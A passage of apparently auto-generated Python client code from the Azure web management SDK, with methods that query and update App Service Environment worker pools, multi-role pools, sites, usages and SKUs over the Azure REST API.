    :rtype: :class:`MetricDefinitionCollection
     <azure.mgmt.web.models.MetricDefinitionCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('MetricDefinitionCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_multi_role_usages(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get usages for a multiRole pool of a hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`UsageCollection
     <azure.mgmt.web.models.UsageCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('UsageCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_web_worker_usages(
        self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
    """Get usages for a worker pool of a hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`UsageCollection
     <azure.mgmt.web.models.UsageCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('UsageCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_sites(
        self, resource_group_name, name, properties_to_include=None, custom_headers=None, raw=False, **operation_config):
    """Get all sites on the hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param properties_to_include: Comma separated list of site properties
     to include
    :type properties_to_include: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`SiteCollection <azure.mgmt.web.models.SiteCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Optional propertiesToInclude first, then the mandatory api-version.
    query_parameters = {}
    if properties_to_include is not None:
        query_parameters['propertiesToInclude'] = self._serialize.query("properties_to_include", properties_to_include, 'str')
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('SiteCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_web_hosting_plans(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get all serverfarms (App Service Plans) on the hostingEnvironment (App
    Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`ServerFarmCollection
     <azure.mgmt.web.models.ServerFarmCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/webhostingplans',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('ServerFarmCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_server_farms(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get all serverfarms (App Service Plans) on the hostingEnvironment (App
    Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`ServerFarmCollection
     <azure.mgmt.web.models.ServerFarmCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('ServerFarmCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_multi_role_pools(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get all multi role pools.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`WorkerPoolCollection
     <azure.mgmt.web.models.WorkerPoolCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('WorkerPoolCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_multi_role_pool(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get properties of a multiRole pool.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`WorkerPool <azure.mgmt.web.models.WorkerPool>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('WorkerPool', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def create_or_update_multi_role_pool(
        self, resource_group_name, name, multi_role_pool_envelope, custom_headers=None, raw=False, **operation_config):
    """
    Create or update a multiRole pool.

    Long-running operation: unless ``raw`` is set, returns an
    AzureOperationPoller that polls the service until the PUT completes.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param multi_role_pool_envelope: Properties of multiRole pool
    :type multi_role_pool_envelope: :class:`WorkerPool
     <azure.mgmt.web.models.WorkerPool>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :rtype:
     :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
     instance that returns :class:`WorkerPool
     <azure.mgmt.web.models.WorkerPool>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(multi_role_pool_envelope, 'WorkerPool')

    # Construct and send request
    # The three closures below capture url/query/header/body state built above
    # and are handed to AzureOperationPoller, which drives the polling loop.
    def long_running_send():
        # Initial PUT that starts the long-running operation.
        request = self._client.put(url, query_parameters)
        return self._client.send(
            request, header_parameters, body_content, **operation_config)

    def get_long_running_status(status_link, headers=None):
        # Poll the status URL returned by the service.
        request = self._client.get(status_link)
        if headers:
            request.headers.update(headers)
        return self._client.send(
            request, header_parameters, **operation_config)

    def get_long_running_output(response):
        # NOTE(review): 400/404/409 are accepted here without raising, as
        # generated; only 200/202 produce a deserialized WorkerPool.
        if response.status_code not in [200, 202, 400, 404, 409]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('WorkerPool', response)
        if response.status_code == 202:
            deserialized = self._deserialize('WorkerPool', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    # raw=True bypasses polling: send once and return the first response.
    if raw:
        response = long_running_send()
        return get_long_running_output(response)

    long_running_operation_timeout = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    return AzureOperationPoller(
        long_running_send, get_long_running_output,
        get_long_running_status, long_running_operation_timeout)
def get_multi_role_pool_skus(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get available skus for scaling a multiRole pool.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`SkuInfoCollection
     <azure.mgmt.web.models.SkuInfoCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('SkuInfoCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_worker_pools(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get all worker pools.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`WorkerPoolCollection
     <azure.mgmt.web.models.WorkerPoolCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('WorkerPoolCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_worker_pool(
        self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
    """Get properties of a worker pool.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`WorkerPool <azure.mgmt.web.models.WorkerPool>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('WorkerPool', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def create_or_update_worker_pool(
        self, resource_group_name, name, worker_pool_name, worker_pool_envelope, custom_headers=None, raw=False, **operation_config):
    """
    Create or update a worker pool.

    Starts a long-running PUT against the App Service Environment and
    returns a poller (or, when ``raw=True``, the raw first response).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param worker_pool_envelope: Properties of worker pool
    :type worker_pool_envelope: :class:`WorkerPool
     <azure.mgmt.web.models.WorkerPool>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype:
     :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
     instance that returns :class:`WorkerPool
     <azure.mgmt.web.models.WorkerPool>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-request correlation id for service-side tracing.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(worker_pool_envelope, 'WorkerPool')

    # Construct and send request
    def long_running_send():
        # Initial PUT that kicks off the long-running operation.
        request = self._client.put(url, query_parameters)
        return self._client.send(
            request, header_parameters, body_content, **operation_config)

    def get_long_running_status(status_link, headers=None):
        # Poll the service-provided status link until completion.
        request = self._client.get(status_link)
        if headers:
            request.headers.update(headers)
        return self._client.send(
            request, header_parameters, **operation_config)

    def get_long_running_output(response):
        # NOTE(review): 400/404/409 are accepted as terminal (non-raising)
        # states here — presumably mirrored from the service spec by the
        # code generator; confirm before tightening.
        if response.status_code not in [200, 202, 400, 404, 409]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('WorkerPool', response)
        if response.status_code == 202:
            deserialized = self._deserialize('WorkerPool', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    if raw:
        # Raw mode skips polling: send once and wrap that first response.
        response = long_running_send()
        return get_long_running_output(response)

    long_running_operation_timeout = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    return AzureOperationPoller(
        long_running_send, get_long_running_output,
        get_long_running_status, long_running_operation_timeout)
def get_worker_pool_skus(
        self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
    """Get available skus for scaling a worker pool.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`SkuInfoCollection
     <azure.mgmt.web.models.SkuInfoCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Resolve the URL template with serialized path segments.
    template = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus'
    url = self._client.format_url(
        template,
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        name=self._serialize.url("name", name, 'str'),
        workerPoolName=self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'))

    # Only the api-version travels on the query string.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble headers: JSON content type, optional correlation id,
    # caller-supplied extras, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET; anything but 200 becomes a CloudError.
    request = self._client.get(url, query)
